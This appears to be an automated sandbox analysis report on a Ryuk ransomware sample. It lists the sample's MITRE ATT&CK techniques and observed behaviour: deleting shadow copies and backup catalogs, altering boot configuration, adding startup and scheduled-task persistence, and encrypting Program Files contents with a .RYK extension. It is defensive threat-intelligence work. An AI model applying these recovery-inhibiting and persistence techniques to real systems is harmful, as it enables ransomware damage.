Malware Analysis Report

2024-08-06 09:27

Sample ID 221110-g3yxnsfde9
Target 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

Threat Level: Known bad

The file 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Clears Windows event logs

Modifies boot configuration data using bcdedit

Deletes shadow copies

Deletes backup catalog

Disables use of System Restore points

Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Checks computer location settings

Modifies file permissions

Drops startup file

Enumerates connected drives

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Runs net.exe

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Interacts with shadow copies

Kills process with taskkill

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Command-Line Interface
T1059
Scheduled Task
T1053
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
File Deletion
T1107
File Permissions Modification
T1222
Hidden Files and Directories
T1158
Indicator Removal on Host
T1070
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490

Analysis: static1

Detonation Overview

Reported

2022-11-10 06:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-11-10 06:20

Reported

2022-11-10 06:23

Platform

win7-20220901-en

Max time kernel

146s

Max time network

49s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

Signatures

Ryuk

ransomware ryuk

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOVEL.WAV.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107192.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Country.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File created C:\Program Files\Java\RyukReadMe.html C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Library\SOLVER\SOLVER.XLAM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SplashScreen.bmp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSQRY32.CHM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN075.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLTASKR.FAE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00233_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Median.thmx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\HeartsMCE.lnk.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OCT.CHM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEML.ICO.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Earthy.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
